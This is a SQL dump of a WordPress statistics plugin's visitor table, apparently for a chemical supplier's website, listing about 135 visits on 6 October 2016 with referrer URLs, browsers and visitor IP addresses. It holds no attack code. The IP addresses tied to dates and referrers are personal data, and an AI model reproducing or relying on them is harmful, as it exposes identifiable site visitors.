INSERT INTO `wp_statistics_visitor` VALUES (927, '2016-10-06', 'https://www.google.se/', 'Chrome', 'Windows', '53.0.2785.143', '', '95.109.37.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (928, '2016-10-06', 'https://search.yahoo.com/', 'Firefox', 'Windows', '49.0', '', '173.164.65.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (929, '2016-10-06', 'https://www.bing.com/search?q=miller-%20stephephenson%20PTFE%20Release%20agent%20dry%20lubrication%20msds%20sheets&qs=n&form=QBRE&pq=miller-%20stephephenson%20ptfe%20release%20agent%20dry%20lubrication%20msds%20sheets&sc=0-68&sp=-1&sk=&cvid=05BD2411A8B642EB9E7484BD8FF29F47', 'MSIE', 'Windows', '10.0', '', '143.62.14.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (930, '2016-10-06', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '50.192.12.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (931, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.1', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (932, '2016-10-06', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '141.189.251.1', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (933, '2016-10-06', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '173.246.247.178', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (934, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '24.96.176.130', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (935, '2016-10-06', 'https://www.google.com.mx/', 'Safari', 'iPhone', '10.0', '', '172.20.13.175', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (936, '2016-10-06', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '134.129.127.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (937, '2016-10-06', 'https://www.bing.com/search?q=miller+stephenson&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '74.93.67.217', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (938, '2016-10-06', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Chrome', 'Windows', '53.0.2785.116', '', '108.248.84.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (939, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.26.21.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (940, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '64.33.177.139', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (941, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '122.227.212.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (942, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiRh_SB3cbPAhUJ_WMKHazvA-sQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.cGc', 'MSIE', 'Windows', '11.0', '', '74.100.234.186', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (943, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '72.142.116.26', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (944, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (945, '2016-10-06', 'https://www.linkedin.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '183.82.109.64', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (946, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '28.0.1467.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (947, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.200.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (948, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '4.0b12pre', '', '46.229.167.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (949, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.23.22.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (950, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '209.139.228.161', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (951, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '4.0b4', '', '46.229.167.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (952, '2016-10-06', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwilyYrw38bPAhUQ82MKHYpgDnIQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.cGc', 'MSIE', 'Windows', '11.0', '', '208.87.54.34', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (953, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (954, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '189.252.72.182', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (955, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '38.104.124.190', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (956, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (957, '2016-10-06', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiytL-O4sbPAhWGOj4KHURwA5oQFggiMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Ftech-support%2Fsds%2F&usg=AFQjCNFg9Q6BXdTX_asj1SxHpiVJGE6Y5g', 'MSIE', 'Windows', '11.0', '', '192.100.100.215', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (958, '2016-10-06', 'https://www.google.com', 'Firefox', 'Macintosh', '40.0', '', '128.135.162.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (959, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '43.0.2357.130', '', '192.180.9.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (960, '2016-10-06', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (961, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.7.239.162', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (962, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '192.3.145.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (963, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.95.83.60', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (964, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '128.115.190.44', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (965, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '201.230.248.168', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (966, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwidysWx58bPAhVN3mMKHZRzDWIQFgg2MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-815c%2F&usg=AFQjCNGBhFPZy83Wvi4ze28ZHEHlBywcdA&sig2=gfuPIqlbKL2auG6-M7gL2Q&bvm=bv.134495766,d.cGc', 'MSIE', 'Windows', '11.0', '', '138.163.106.72', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (967, '2016-10-06', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '189.223.153.199', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (968, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwidysWx58bPAhVN3mMKHZRzDWIQFgg2MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-815c%2F&usg=AFQjCNGBhFPZy83Wvi4ze28ZHEHlBywcdA&sig2=gfuPIqlbKL2auG6-M7gL2Q&bvm=bv.134495766,d.cGc', 'MSIE', 'Windows', '11.0', '', '138.163.106.71', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (969, '2016-10-06', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '187.158.245.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (970, '2016-10-06', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (971, '2016-10-06', 'https://www.avtolombard-krasnodar.com/', 'MSIE', 'Windows', '6.0', '', '178.137.84.86', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (972, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.75.212.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (973, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '12.199.184.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (974, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '219.130.222.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (975, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (976, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (977, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj8z-G76sbPAhWJGB4KHQYfDCAQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FHeloxy.pdf&usg=AFQjCNEqJwggoJGvKB1ZOMq8A9m4dLsWyw&sig2=c3ovk_P_uEn224wmeivJ1w', 'MSIE', 'Windows', '11.0', '', '141.189.251.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (978, '2016-10-06', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '69.47.151.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (979, '2016-10-06', 'https://r.search.yahoo.com/_ylt=AwrBT8lunPZX2BsACytXNyoA;_ylu=X3oDMTByNXQ0NThjBGNvbG8DYmYxBHBvcwM1BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1475808494/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2faeroduster-ms-222n%2f/RK=0/RS=X3ZeKhPQl_lEjy4HU2xwYGAZCTQ-', 'MSIE', 'Windows', '11.0', '', '216.118.223.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (980, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (981, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (982, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (983, '2016-10-06', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '67.236.82.158', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (984, '2016-10-06', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '50.193.211.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (985, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '186.95.20.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (986, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '69.178.166.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (987, '2016-10-06', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '68.52.64.65', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (988, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '40.132.73.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (989, '2016-10-06', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '69.17.145.34', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (990, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '33.0', '', '54.149.134.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (991, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (992, '2016-10-06', 'https://www.google.com/', 'Firefox', 'Windows', '48.0', '', '66.93.206.100', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (993, '2016-10-06', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '107.77.94.111', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (994, '2016-10-06', 'https://www.bing.com/search?q=miller+stephenson+chemical&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '146.6.208.13', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (995, '2016-10-06', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiAs4Th8sbPAhVCbH4KHcRVB74YABAB&sig=AOD64_10tn3uFWEJ0CjxFPRKZwNuqLf8aQ&rct=j&q=&ved=0ahUKEwjbvv_g8sbPAhVBymMKHak6DwkQ0QwIIg&adurl=', 'MSIE', 'Windows', '11.0', '', '162.247.61.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (996, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.94.65.56', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (997, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.52.59.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (998, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (999, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '12.49.238.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1000, '2016-10-06', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants/', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1001, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '12.49.238.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1002, '2016-10-06', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '5.5', '', '104.193.10.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1003, '2016-10-06', 'https://www.miller-stephenson.com/', 'Unknown', 'Unknown', 'Unknown', '', '104.193.10.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1004, '2016-10-06', 'https://www.miller-stephenson.com/', 'West', 'Unknown', 'Unknown', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1005, '2016-10-06', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '5.11', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1006, '2016-10-06', 'https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent', 'Opera', 'Windows', '9.20', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1007, '2016-10-06', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '3.0', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1008, '2016-10-06', 'https://www.miller-stephenson.com/', 'Amiga-AWeb', 'Unknown', '3.4.167SE', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1009, '2016-10-06', 'https://www.miller-stephenson.com/', 'WordPress', 'Unknown', 'x.x.x.x', '', '104.193.10.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1010, '2016-10-06', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiRuabc9cbPAhXYCYEKHVnjArAYABAB&sig=AOD64_301o2LOjxCdpoH6U-B90cIf9Sqig&ctype=4&rct=j&q=&ved=0ahUKEwibkqPc9cbPAhVLWj4KHfT4DLcQwgUIJSgA&adurl=', 'MSIE', 'Windows', '11.0', '', '69.74.43.38', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1011, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1012, '2016-10-06', 'https://www.bing.com/search?q=miller+stephenson+chemical&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '152.132.10.250', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1013, '2016-10-06', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '40.134.86.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1014, '2016-10-06', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '192.198.80.227', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1015, '2016-10-06', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjTzOOF-sbPAhUCimkKHU49CwkYABAA&sig=AOD64_0k14CHA-1PG27339pO7I6RfqoGVg&rct=j&q=&ved=0ahUKEwjUmOCF-sbPAhXKH6wKHY34DeUQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '98.103.148.231', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1016, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '4.31.155.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1017, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '10.192.93.185', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1018, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwipvtKt-8bPAhUEHGMKHRZnD4MQFggjMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-730%2C%2520732.pdf&usg=AFQjCNHSf6mjgc958vTTnw8_0Obpqatgxg', 'MSIE', 'Windows', '11.0', '', '63.110.180.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1019, '2016-10-06', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '173.227.7.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1020, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.151.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1021, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1022, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '199.107.68.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1023, '2016-10-06', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.107.68.203', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1024, '2016-10-06', 'https://gotomontenegro.net/', 'MSIE', 'Unknown', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1025, '2016-10-06', 'https://www.google.com.br/', 'Chrome', 'Windows', '53.0.2785.143', '', '179.81.63.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1026, '2016-10-06', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1027, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '94.181.158.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1028, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '45.0.2454.85', '', '10.48.71.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1029, '2016-10-06', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '166.137.8.127', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1030, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '32.217.34.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1031, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.247.163.66', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1032, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '206.190.72.205', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1033, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '204.169.30.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1034, '2016-10-06', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj04cTthMfPAhVDfiYKHYtrBuwQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FHeloxy.pdf&usg=AFQjCNEqJwggoJGvKB1ZOMq8A9m4dLsWyw&bvm=bv.134495766,d.cWw', 'MSIE', 'Windows', '11.0', '', '63.254.251.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1035, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1036, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1037, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '33.0.1750.152', '', '178.32.87.239', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1038, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.121.161.167', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1039, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '130.182.24.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1040, '2016-10-06', 'https://www.google.com', 'Firefox', 'Windows', '36.0', '', '54.227.77.187', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1041, '2016-10-06', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjCyrTpicfPAhWCPz4KHQ8kDzsQFghMMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&bvm=bv.134495766,d.cWw', 'MSIE', 'Windows', '11.0', '', '50.99.136.8', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1042, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '108.26.131.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1043, '2016-10-06', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '174.29.100.169', '000', 37, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1044, '2016-10-06', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '71.169.3.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1045, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '201.156.184.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1046, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '48.0.2564.103', '', '129.186.251.20', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1047, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '72.51.45.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1048, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1049, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.20', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1050, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '31.193.51.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1051, '2016-10-06', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.240.188.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1052, '2016-10-06', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.112.23', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1053, '2016-10-06', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '104.168.85.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1054, '2016-10-06', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.168.85.152', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1055, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.191.17.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1056, '2016-10-06', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.200.156.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1057, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '48.0', '', '208.50.115.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1058, '2016-10-06', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '104.6.109.65', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1059, '2016-10-06', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1060, '2016-10-06', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '64.31.121.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1061, '2016-10-06', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '51.0.2704.103', '', '138.201.58.84', '000', 2, 0); 
